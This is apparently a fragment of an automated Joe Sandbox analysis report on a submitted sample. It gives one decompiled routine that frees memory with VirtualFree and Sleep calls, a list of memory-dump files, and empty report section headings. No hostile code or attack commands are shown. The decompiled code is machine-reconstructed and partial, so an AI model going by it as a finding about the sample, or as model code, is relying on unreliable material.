Source File: 0000000C.00000002.14988367739.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.14988330024.00400000.00000002.sdmp
Associated: 0000000C.00000002.14989805703.00491000.00000040.sdmp
Associated: 0000000C.00000002.14989835401.0049A000.00000040.sdmp
Associated: 0000000C.00000002.14991020072.00513000.00000080.sdmp
Associated: 0000000C.00000002.14991088656.00514000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_358saxio.jbxd

Function 004017A2, Relevance: 1.3, APIs: 1, Instructions: 26

C-Code - Quality: 91%

			E004017A2(void* __eax) {
				void* __esi;
				void* _t5;
				signed int _t6;
				signed int _t7;
				void* _t10;
				void* _t12;
				void* _t14;
				void* _t16;
				void _t17;

				_push(_t16);
				_t10 = __eax - 0x10;
				E00401700(__eax, _t12, _t16);
				_t5 = _t10;
				_t17 =  *_t5;
				_t14 =  *(_t5 + 4);
				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
				if(_t6 == 0) {
					_t7 = _t6 | 0xffffffff;
				} else {
					 *_t14 = _t17;
					 *(_t17 + 4) = _t14;
					_t7 = 0;
				}
				 *0x48b7a4 = 0;
				return _t7;
			}

0x004017a5
0x004017a9
0x004017ac
0x004017b1
0x004017b3
0x004017b5
0x004017c0
0x004017c7
0x004017d2
0x004017c9
0x004017c9
0x004017cb
0x004017ce
0x004017ce
0x004017d5
0x004017df

APIs

Part of subcall function 00401700: Sleep.KERNEL32 ref: 0040170D
Part of subcall function 00401700: Sleep.KERNEL32(0000000A), ref: 00401726

VirtualFree.KERNEL32(?,00000000,00008000), ref: 004017C0

Memory Dump Source

Source File: 0000000C.00000002.14988367739.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.14988330024.00400000.00000002.sdmp
Associated: 0000000C.00000002.14989805703.00491000.00000040.sdmp
Associated: 0000000C.00000002.14989835401.0049A000.00000040.sdmp
Associated: 0000000C.00000002.14991020072.00513000.00000080.sdmp
Associated: 0000000C.00000002.14991088656.00514000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_358saxio.jbxd

Non-executed Functions

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Software Vulnerabilities:

Networking:

Boot Survival:

Remote Access Functionality:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage